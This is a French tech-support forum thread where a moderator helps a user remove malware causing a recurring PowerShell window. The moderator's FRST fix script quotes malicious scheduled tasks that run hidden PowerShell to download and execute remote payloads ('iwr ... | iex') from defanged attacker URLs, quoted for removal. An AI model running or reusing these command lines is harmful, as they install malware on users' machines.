Fenêtre powershell
Résolu
sandramp11
Messages postés
5
Date d'inscription
Statut
Membre
Dernière intervention
-
bazfile Messages postés 58595 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
bazfile Messages postés 58595 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour,
J'ai une fenetre bleue powershell... qui s'affiche de manière intempestive. J'ai trouvé sur le forum une marche à suivre mais il faut toujours envoyer un lien à une personne.
Est ce que quelqu'un peut m'aider svp?
J'ai une fenetre bleue powershell... qui s'affiche de manière intempestive. J'ai trouvé sur le forum une marche à suivre mais il faut toujours envoyer un lien à une personne.
Est ce que quelqu'un peut m'aider svp?
A voir également:
- Fenêtre powershell intempestive
- Mcafee fenetre intempestive - Accueil - Piratage
- Fenetre windows - Guide
- Fenêtre hors écran windows 11 - Guide
- Fenetre de navigation privée - Guide
- Virus powershell - Guide
6 réponses
Bonjour.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :
Clique sur Analyser
Attention, attendre que les messages disant que l'analyse est terminée s'affichent
À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.
Bonjour,
Merci de votre aide.
Voici les liens générés:
https://www.cjoint.com/c/LFfqpLDXiHS
https://www.cjoint.com/c/LFfqqCyTtHS
Merci à vous
Merci de votre aide.
Voici les liens générés:
https://www.cjoint.com/c/LFfqpLDXiHS
https://www.cjoint.com/c/LFfqqCyTtHS
Merci à vous
Bonjour,
Désinstalle WebAdvisor par McAfee c'est un adware.
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
Désinstalle WebAdvisor par McAfee c'est un adware.
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
Startup: C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS [2022-05-04] () [Fichier non signé]
Task: {22D33687-DB97-465E-91EE-88E87C4D7315} - System32\Tasks\Unlimited => C:\ProgramData\Unlimited\ISO\Unlimited.vbs [207 2022-05-11] () [Fichier non signé]
Task: {4196150C-7D1B-4212-B97B-72FCA87CEFA0} - System32\Tasks\Error => C:\ProgramData\Error\ISO\Error.vbs [12395 2022-06-05] () [Fichier non signé]
Task: {6D337A76-BA1D-47FC-A9F0-70128E763F11} - System32\Tasks\Turismo => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/tur/turismo.jpg"" -useB|iex;
Task: {CB425767-D91C-4BD6-BC96-495375A83BD4} - System32\Tasks\HomeOffice => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
Task: {E022830E-8C34-429E-96A0-D99407D83010} - System32\Tasks\CCleanData => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://skynetx.com.br/booking.jpg"" -useB|iex;
Task: {F8E3FA99-9FCE-45BC-BACA-0A6CD7143FCE} - System32\Tasks\AudioHD32 => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex;
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
CHR Notifications: Default -> hxxps://business.facebook.com; hxxps://www.aidetechniqueauto.fr; hxxps://www.epson.co.uk; hxxps://www.epson.fr; hxxps://www.legisocial.fr; hxxps://www.thaiairways.com
CHR DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/search?fr=mcafee&type=E211FR885G0&p={searchTerms}
FirewallRules: [{079473BA-C039-4215-AFFA-FB367D5C5F38}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe => Pas de fichier
FirewallRules: [{502B5D49-C7D3-434B-96D2-BD8520312154}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe => Pas de fichier
FirewallRules: [{2045AC83-7DBD-4C98-B98B-6331608C961F}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe => Pas de fichier
FirewallRules: [{0635A61D-F21F-4A37-811D-1D8571E683E2}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => Pas de fichier
FirewallRules: [{8123CDC8-3D05-4547-A7C4-8997F334712D}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\EpInsNav\DL\3013\Network\EpsonNetSetup\Data\ENEasyApp.exe => Pas de fichier
FirewallRules: [{A197C030-5DA6-4603-B083-59004D41DB44}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [{3B3D98D6-F91F-421C-A020-08DA14413169}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Roaming\Zoom\bin\airhost.exe => Pas de fichier
FirewallRules: [{CC5A3340-BAD1-4A8C-996B-4447948A8499}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\RarSFX0\InstallationPackage\Install\x64\InstallGui.exe => Pas de fichier
FirewallRules: [{1B56139A-2C80-4009-A3C8-8E96815D7466}] => (Allow) C:\Users\BUREAU DU MAS\AppData\Local\Temp\RarSFX0\InstallationPackage\Install\x64\InstallGui.exe => Pas de fichier
C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS
C:\ProgramData\Unlimited\ISO\Unlimited.vbs
C:\ProgramData\Error\ISO\Error.vbs
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT
POUR INFORMATION:
Ta version de Windows 10 n'est pas à jour, pour le vérifier va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps.
merci de ta réponse rapide.
Quand je vais dans le dossier mc afee pr supprimer le dossier web advisor, il ne veut pas car il me dit qu'il est ouvert ailleurs mais je ne sais pas où. Je n'ai rien pour mettre en suspens l'anti virus.
Quand je vais dans le dossier mc afee pr supprimer le dossier web advisor, il ne veut pas car il me dit qu'il est ouvert ailleurs mais je ne sais pas où. Je n'ai rien pour mettre en suspens l'anti virus.
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
https://www.cjoint.com/c/LFfrThbRYrS
depuis le redémarrage, rien, affaire à suivre..
merci beaucoup en tout cas si cela a fonctionné
depuis le redémarrage, rien, affaire à suivre..
merci beaucoup en tout cas si cela a fonctionné
Le fixlog est OK, tu ne devrais plus être embêté.
Par prudence change tes mots de passe en ligne ils ont pu être dérobés.
Pour WebAdvisor par McAfee tu peux le désinstaller avec Revo Uninstaller en mode scan avancé.
.
Par prudence change tes mots de passe en ligne ils ont pu être dérobés.
Pour WebAdvisor par McAfee tu peux le désinstaller avec Revo Uninstaller en mode scan avancé.
Tutoriel Revo Uninstaller à lire attentivement.
Accepter la désinstallation du programme que l'on souhaite désinstaller et si il y a un message d'erreur disant que la désinstallation est impossible fermer le message d'erreur et continuer la procédure.
Cocher "Scan avancé" puis cliquer sur "Scan".
Cliquer sur "Sélectionner tout" puis sur "Supprimer" si une deuxième liste apparaît faire de même puis une fois que tout est supprimé cliquer sur "Fini" un redémarrage sera peut-être demandé.
Pour terminer.
Si tout est OK pour toi et que ton pc fonctionne bien, tu peux désinstaller FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.
.
